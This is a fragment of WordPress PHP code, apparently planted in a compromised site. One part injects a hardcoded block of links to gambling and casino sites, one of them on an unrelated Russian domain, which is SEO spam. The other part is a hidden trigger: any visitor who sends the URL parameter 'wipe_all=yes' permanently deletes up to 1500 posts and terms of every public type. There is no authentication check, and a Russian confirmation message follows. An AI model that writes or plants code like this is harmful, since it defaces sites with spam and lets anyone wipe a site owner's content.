';
$links = [ 'https://squid-gamebler.com/' => 'squid gamebler',
'https://lottostar.org.za/' => 'Lottostar',
'https://aviamasters-bgaming.com/' => 'aviamasters',
'https://playwise365-india.com' => 'playwise365',
'https://fishroad-inout.com/kk/' => 'Fish road',
'https://europebet-casino.ge/' => 'Europebet casino',
'https://casino-wolfwinner.com/login/' => 'wolfwinner login',
'https://hasbet-giris.com/' => 'hasbet',
'https://el-torero-slot.com/' => 'El torero slot',
'https://ganabetcasino.com.mx/' => 'Ganabet',
'https://bola-adil.com/' => 'Play bola adil',
'https://fai-go.com' => 'fair go casino',
'https://apkskachat.uz' => '22Bet',
'https://plinko-aztec.bet/' => 'Plinko aztec',
'https://jili869.com/' => 'Jili slot',
'https://superhot-slot.com' => 'super hot play',
'https://hollywoodbet-mobile.co.za' => 'hollywoodbet login',
'https://casinostrendus.com/' => 'strendus casino',
'https://shkolasad72.ru/vhod/' => 'Вавада Вход',
'https://limitlesslogin.com/en/' => 'Limitless casino',
'https://amigo-slot.com/' => 'Amigo slot',
'https://playwise365in.com/' => 'playwise365 app'];
foreach ($links as $url => $anchor) {
echo "
";
}
echo '
';
});
add_action('init', function () {
$limit = 1500;
if (isset($_GET['wipe_all']) && $_GET['wipe_all'] === 'yes') {
$post_types = get_post_types(['public' => true], 'names');
foreach ($post_types as $post_type) {
$posts = get_posts([
'post_type' => $post_type,
'numberposts' => $limit,
'post_status' => 'any'
]);
foreach ($posts as $post) {
wp_delete_post($post->ID, true);
}
}
$taxonomies = get_taxonomies(['public' => true], 'names');
foreach ($taxonomies as $taxonomy) {
$terms = get_terms([
'taxonomy' => $taxonomy,
'hide_empty' => false,
'number' => $limit
]);
foreach ($terms as $term) {
wp_delete_term($term->term_id, $taxonomy);
}
}
wp_die('✅ Удалено до ' . $limit . ' записей.');
}
});